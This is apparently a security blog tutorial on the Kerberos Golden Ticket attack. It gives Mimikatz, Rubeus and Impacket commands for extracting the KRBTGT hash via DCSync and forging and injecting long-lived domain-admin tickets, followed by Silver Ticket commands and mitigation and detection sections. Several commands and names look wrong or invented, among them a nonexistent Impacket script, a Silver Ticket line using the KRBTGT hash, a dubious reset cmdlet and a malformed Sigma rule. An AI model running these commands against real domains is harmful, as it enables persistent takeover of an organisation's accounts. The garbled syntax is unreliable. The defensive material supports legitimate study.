Golden Ticket Attack | Saikumar Infosec

🧠 Description

A Golden Ticket attack involves forging a Kerberos Ticket Granting Ticket (TGT) using the KRBTGT account's NTLM password hash. This gives the attacker persistent, domain-wide authentication that can last up to the maximum ticket lifetime (typically 10 hours by default, but forgeable for years).

Why Golden Ticket is Critical:

Persistence: Access lasts until KRBTGT password is rotated twice
Evasion: Completely bypasses normal authentication
Domain Dominance: Authenticate as any user to any service
Privilege Escalation: Forge tickets for Domain Admin or any account
Detection Evasion: Doesn't trigger normal login alerts

Kerberos Authentication Overview:

User requests TGT from AS (Authentication Service)
AS returns TGT encrypted with KRBTGT hash
User presents TGT to TGS (Ticket Granting Service)
TGS returns service ticket for requested resource
User presents service ticket to resource

In a Golden Ticket attack, the attacker bypasses steps 1-3 by forging their own TGT using the KRBTGT hash.

⚠️ Preconditions

KRBTGT Hash: Must obtain the NTLM or AES hash of the KRBTGT account
Domain Name: FQDN of the target domain
User SID: SID of any account (typically Domain Admin)
Domain SID: SID of the domain (not user portion)

How to Get KRBTGT Hash:

Domain Admin access → DCSync attack
NTDS.dit extraction
LSASS memory dump on Domain Controller
Any method that yields the KRBTGT password hash

💣 Attack Execution

Using Mimikatz:

# Option 1: DCSync to get KRBTGT hash
mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

# Option 2: Extract from NTDS.dit
mimikatz # lsadump::sam /sam:SAM_dump /system:SYSTEM_dump

# Create Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:krbtgt_hash_here /id:500 /groups:513,512,520,518,519

# Inject ticket into current session
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-xxx /krbtgt:hash /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Verify with directory access
mimikatz # lsadump::dcsync /domain:target.local /user:Administrator /all

Using Rubeus:

# Create Golden Ticket
Rubeus.exe goldenticket /domain:target.local /user:Administrator /sid:S-1-5-21-xxx /krbtgt:krbtgt_hash /ptt

# With custom expiration (default 10 years)
Rubeus.exe goldenticket /domain:target.local /user:Administrator /sid:S-1-5-21-xxx /krbtgt:hash /endin:87600 /ptt

# After creation, verify access
Rubeus.exe asktgt /user:Administrator /domain:target.local /rc4:krbtgt_hash

Using Impacket:

# Python script for Golden Ticket
python3 goldenTicket.py -domain target.local -domain-sid S-1-5-21-xxx -krbtgt-hash hash -user-id 500

# Load ticket with ticket converter
python3 ticketer.py -domain target.local -domain-sid S-1-5-21-xxx -krbtgt-hash hash -user Administrator

# Export tokirbi file and load
export KRB5CCNAME=admin.ccache
python3 getST.py -self -impersonate Administrator -dc-ip 192.168.1.1 target.local/krbtgt

💥 Impact Analysis

Capabilities Gained:

Impersonate Any User: Become any user including Domain Admins
Access Any Resource: Any file share, database, or service
DCSync: Replicate domain database for all credentials
Persistence: Access remains until password reset
Trust Exploitation: Forge tickets for forest trusts

Attack Chain:

Gain Domain Admin access through other means
Extract KRBTGT hash via DCSync
Create Golden Ticket for persistence
Wait for detection of initial compromise
Attacker gets removed from Domain Admins
Golden Ticket still works - full access restored

🥈 Silver Ticket vs Golden Ticket

Aspect	Golden Ticket	Silver Ticket
Ticket Type	TGT (Ticket Granting Ticket)	TGS (Service Ticket)
Encrypted With	KRBTGT hash	Service account hash
Scope	Entire domain	Single service
Privilege	Any user, any service	Specific service account
Detection	Harder to detect	Easier to detect
Duration	Up to 10 years	Service account's max

Silver Ticket Example:

# Create Silver Ticket for CIFS (file share)
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-xxx /target:cifs.server.target.local /service:cifs /krbtgt:hash /ptt

# Access file share
dir \\server.target.local\c$

🛡️ Mitigation

✅ Golden Ticket Defense:

KRBTGT Password Reset: Reset twice (48 hours apart)
Privileged Account Monitoring: Alert on KRBTGT access
Event Log Monitoring: Alert on unusual TGT activity
Protected Users Group: Don't allow protected users to use RC4
AES Encryption Only: Force AES for all Kerberos tickets

KRBTGT Reset Script:

# Reset KRBTGT password (run twice, 24 hours apart)
# This breaks ALL existing TGTs including any Golden Tickets
Reset-ADAccountPassword -Identity krbtgt -DomainController dc01.target.local

# Or using safer reset method (requires Jan 2023 updates)
Invoke-ADLabResetKrbtgtPassword -Identity krbtgt -DistinguishedName "CN=krbtgt,CN=Users,DC=target,DC=local"

# Verify reset was successful
Get-ADUser krbtgt -Properties msds-keyversionnumber

Monitoring Event ID 4768:

# Alert on suspicious TGT requests
# Golden Tickets often have unusual properties:
# - Future start time (StartTime)
# - Unusually long lifetime
# - Non-standard encryption type
# - Unusual account names

Get-WinEvent -FilterHashtable @{LogName='Security';ID=4768} |
  Where-Object {
    $_.TimeGenerated -gt (Get-Date).AddDays(-1) -and
    ($_.Properties[4].Value -match "future_date" -or
     $_.Properties[8].Value -gt 86400)  # > 24 hours
  }

🔍 Detection

Event ID 4768 (TGT Request) Analysis:

Request from unusual source IP
Ticket lifetime > 10 hours
Start time in the past (retroactive ticket)
Account never authenticates normally
Unusual service type (rc4 vs aes)

Sigma Rule:

title: Suspicious Golden Ticket Usage
id: golden-ticket-detection
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: 0x17  # RC4-HMAC
  timeframe:
    # Check for multiple requests with same ticket
  condition: selection
fields:
  - TargetUserName
  - ServiceName
  - IpAddress
level: critical

👑 Golden Ticket Attack